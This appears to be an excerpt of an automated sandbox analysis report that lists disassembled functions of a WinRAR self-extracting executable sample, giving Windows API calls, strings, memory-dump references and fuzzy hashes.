                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                      • Instruction ID: 52188c2d11fb1eae89e66e3253b7433da763933feaf5a8e33bd7fd991407c1c9
                                                                      • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                      • Instruction Fuzzy Hash: F8A14873A023C6DFEB21DF2AC8917AEBBE5EF59310F24416DE6459B291D23C8941C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,007C7F69,?,?,?), ref: 007CA3FA
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,007C7F69,?), ref: 007CA43E
                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,007C7F69,?,?,?,?,?,?,?), ref: 007CA4BF
                                                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,007C7F69,?,?,?,?,?,?,?,?,?,?), ref: 007CA4C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Create$CloseHandleTime
                                                                      • String ID:
                                                                      • API String ID: 2287278272-0
                                                                      • Opcode ID: 8b48d1393ebb833e71744c0890d9a79b89254d3adaed69fe6f12d68aeb84ad1d
                                                                      • Instruction ID: 4feeda6612b446d35a51cc8d55b88edbe332c523642eda095ab3c2ffe23147fe
                                                                      • Opcode Fuzzy Hash: 8b48d1393ebb833e71744c0890d9a79b89254d3adaed69fe6f12d68aeb84ad1d
                                                                      • Instruction Fuzzy Hash: 9041C0312483C5AAD731DF28DC59FAEBBE4AB95309F04091DB5D1D3180D6A8DA48DB53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,007E47C6,00000000,00000000,007E57FB,?,007E57FB,?,00000001,007E47C6,2DE85006,00000001,007E57FB,007E57FB), ref: 007EC9D5
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007ECA5E
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007ECA70
                                                                      • __freea.LIBCMT ref: 007ECA79
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: cec7da0bb2761ea12a9bb78a883b33d34021ad69de56fca07c42c286ef889df5
                                                                      • Instruction ID: 69289685aaac80d43fa1ddb3b1e877422f7a3ddaecb5103859391ec6616e288d
                                                                      • Opcode Fuzzy Hash: cec7da0bb2761ea12a9bb78a883b33d34021ad69de56fca07c42c286ef889df5
                                                                      • Instruction Fuzzy Hash: 1331D072A0124AABDF25DF65CC45DBE7BA5EB49310B048128FC04E6250EB39DD51CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 007DA666
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 007DA675
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007DA683
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 007DA691
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 4a6eb454379885ff1731d087345e56473091c6abf67d10733b61d881c0fdb553
                                                                      • Instruction ID: 1583cf5fb98b217d1cf02a13ca10305ee5354604e82f0857e4c3eb1455cb50a5
                                                                      • Opcode Fuzzy Hash: 4a6eb454379885ff1731d087345e56473091c6abf67d10733b61d881c0fdb553
                                                                      • Instruction Fuzzy Hash: 7AE0EC31942F21F7D2715B60AC1EB8A3E64BB05B52F018111FB05961D0DB6886418BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DD06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr
                                                                      • String ID: .lnk$d}
                                                                      • API String ID: 2691759472-2346131625
                                                                      • Opcode ID: fcd24fafd94eeda4c2539ebb17303c40c022497f8860893ea1708e263b86cabb
                                                                      • Instruction ID: 0b08d36d33d6822fda13a3902bce4139b0d7b31b5ac10ab96e7990642bd493c7
                                                                      • Opcode Fuzzy Hash: fcd24fafd94eeda4c2539ebb17303c40c022497f8860893ea1708e263b86cabb
                                                                      • Instruction Fuzzy Hash: A1A12172900129A6DF34DBA4CD49EFA73FCAF44304F0885A7B509E7241EE799E858B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 007EB324
                                                                        • Part of subcall function 007E9097: IsProcessorFeaturePresent.KERNEL32(00000017,007E9086,00000000,007E8D94,00000000,00000000,00000000,00000016,?,?,007E9093,00000000,00000000,00000000,00000000,00000000), ref: 007E9099
                                                                        • Part of subcall function 007E9097: GetCurrentProcess.KERNEL32(C0000417,007E8D94,00000000,?,00000003,007E9868), ref: 007E90BB
                                                                        • Part of subcall function 007E9097: TerminateProcess.KERNEL32(00000000,?,00000003,007E9868), ref: 007E90C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                      • String ID: *?$.
                                                                      • API String ID: 2667617558-3972193922
                                                                      • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                      • Instruction ID: 34ae9c649a2b500a4c57d32cea498717ba6f7818c74176a43c5a55e5d99714e2
                                                                      • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                      • Instruction Fuzzy Hash: 02519172E0114ADFDF14DFA9C8819AEBBB9FF5C314F244169E954E7340E7399A018B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C75E3
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C777F
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                      • String ID: :
                                                                      • API String ID: 3226429890-336475711
                                                                      • Opcode ID: 48c7edf670e1571901678d3817f9ef36e46c27132fd4a57ce35ecfc98e153dc8
                                                                      • Instruction ID: ed9cbb12e34847584c5f92f580efc77692b7813a1b4fbeac6432157f64640362
                                                                      • Opcode Fuzzy Hash: 48c7edf670e1571901678d3817f9ef36e46c27132fd4a57ce35ecfc98e153dc8
                                                                      • Instruction Fuzzy Hash: D9416E71800558E9EB25EB64DC9EFEEB378AF41300F00809EB609A6192DB785F85CF71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr
                                                                      • String ID: *
                                                                      • API String ID: 2691759472-163128923
                                                                      • Opcode ID: dffa311cba326ce851a76a281dc84b56e27954f8cc264f8ea7bbd9f3e9d78b1e
                                                                      • Instruction ID: fa5aea70c38f8a3771a0fcc1c2c3a31ffedbb3d9fa9aabc3909a6b80b678dc56
                                                                      • Opcode Fuzzy Hash: dffa311cba326ce851a76a281dc84b56e27954f8cc264f8ea7bbd9f3e9d78b1e
                                                                      • Instruction Fuzzy Hash: EC31373250C7C19ACA38AE948907F7B73E8DFA5B50F15801EFD8457143E72E8E469361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: }
                                                                      • API String ID: 176396367-4239843852
                                                                      • Opcode ID: 5a5c9ebb8c2e4c52c7c51ca3ec2760c26d172675cea9031d1b48a8696a0bb2a7
                                                                      • Instruction ID: 2a37bfe1c0b6888326d5ce30984065d5c12d6af86725a6b58afc26153dd5a345
                                                                      • Opcode Fuzzy Hash: 5a5c9ebb8c2e4c52c7c51ca3ec2760c26d172675cea9031d1b48a8696a0bb2a7
                                                                      • Instruction Fuzzy Hash: B321CF6290524ADAD731EA64E849E6AB3FCDF95760F06042BF641C3341EB6C995883A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DialogBoxParamW.USER32(GETPASSWORD1,0001047C,007DB270,?,?), ref: 007DDE18
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DialogParam
                                                                      • String ID: GETPASSWORD1$r}
                                                                      • API String ID: 665744214-3306145559
                                                                      • Opcode ID: a4555922ca6ecbb34e2f11760a07c24e085f99263486038f3de4303941297bd2
                                                                      • Instruction ID: 139e1cd0f6161378c25d154f88b69da2e06c3ad2c298e0b875e5b55b6c0323a8
                                                                      • Opcode Fuzzy Hash: a4555922ca6ecbb34e2f11760a07c24e085f99263486038f3de4303941297bd2
                                                                      • Instruction Fuzzy Hash: 98110B72600154AADF219E349C05BAF37A8BB09751F14456AFA45EB281C6B8AC84C764
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007CF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007CF2E4
                                                                        • Part of subcall function 007CF2C5: GetProcAddress.KERNEL32(008081C8,CryptUnprotectMemory), ref: 007CF2F4
                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,007CF33E), ref: 007CF3D2
                                                                      Strings
                                                                      • CryptProtectMemory failed, xrefs: 007CF389
                                                                      • CryptUnprotectMemory failed, xrefs: 007CF3CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CurrentProcess
                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                      • API String ID: 2190909847-396321323
                                                                      • Opcode ID: 67179225d23ceb11844f98ed309b1c8bfe428a08edb0aae6b417a1256677824f
                                                                      • Instruction ID: c2e94f31c8431eeebfa02a3c6b72062e97b60fc3971fe14d0ffb8be4cff482cd
                                                                      • Opcode Fuzzy Hash: 67179225d23ceb11844f98ed309b1c8bfe428a08edb0aae6b417a1256677824f
                                                                      • Instruction Fuzzy Hash: 091100316016A9BBDF11AF20DC45F6E3B56FF04720B00816EFC419B291DA3CDE418AA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: Software\WinRAR SFX$}
                                                                      • API String ID: 176396367-2483599790
                                                                      • Opcode ID: e80c2a14455d68d1fea00ea0c57c2cefd18c3d01d4696996cbb70cba156aa8e6
                                                                      • Instruction ID: ff4de43789c3c0554b91c0d3993886def627751732d77dcfa000728e40454691
                                                                      • Opcode Fuzzy Hash: e80c2a14455d68d1fea00ea0c57c2cefd18c3d01d4696996cbb70cba156aa8e6
                                                                      • Instruction Fuzzy Hash: 44011A71500258BAEB329B95DC0EFDF7F7CFB05794F004052B54AA11A1D7A88A88CAA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D1FE5
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D1FF6
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D2006
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D2014
                                                                        • Part of subcall function 007D1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007CB371,?,?,00000000,?,?,?), ref: 007D202F
                                                                        • Part of subcall function 007DAC04: SetCurrentDirectoryW.KERNELBASE(?,007DAE72,C:\Users\user\Desktop,00000000,0080946A,00000006), ref: 007DAC08
                                                                      • _wcslen.LIBCMT ref: 007DAE8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CompareCurrentDirectoryString
                                                                      • String ID: <}$C:\Users\user\Desktop
                                                                      • API String ID: 521417927-660420333
                                                                      • Opcode ID: 1192a491fa7cb444e84b4fd4bf860c0574d0c65d7fab8ee9ca3ed30f32c7e3c9
                                                                      • Instruction ID: f68b38339da31eb44d5fa9fba3d00500d1e386bd0a36f6495f7a53a39bc0c9ed
                                                                      • Opcode Fuzzy Hash: 1192a491fa7cb444e84b4fd4bf860c0574d0c65d7fab8ee9ca3ed30f32c7e3c9
                                                                      • Instruction Fuzzy Hash: 55011E71D00619A5DF11ABA4DD0EEDE73BCFF08700F040466F646F3291E6BC9694CAA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Malloc
                                                                      • String ID: (}$Z}
                                                                      • API String ID: 2696272793-402608430
                                                                      • Opcode ID: ea44104206fc60e1b86ebfd3fe8d4e1f65d92f178448ecc9dcf531cd227df485
                                                                      • Instruction ID: f836608682af5d040b676f7d4f865c85364e3adc625f1bf7afad64f00e70520d
                                                                      • Opcode Fuzzy Hash: ea44104206fc60e1b86ebfd3fe8d4e1f65d92f178448ecc9dcf531cd227df485
                                                                      • Instruction Fuzzy Hash: D10146B6600108FFDF059FB0DC59CAEBBBDFF08344700815AB906D7220E635AA45DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,007D1101,?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FEA
                                                                      • GetLastError.KERNEL32(?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FF6
                                                                        • Part of subcall function 007C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C6C54
                                                                      Strings
                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007D0FFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
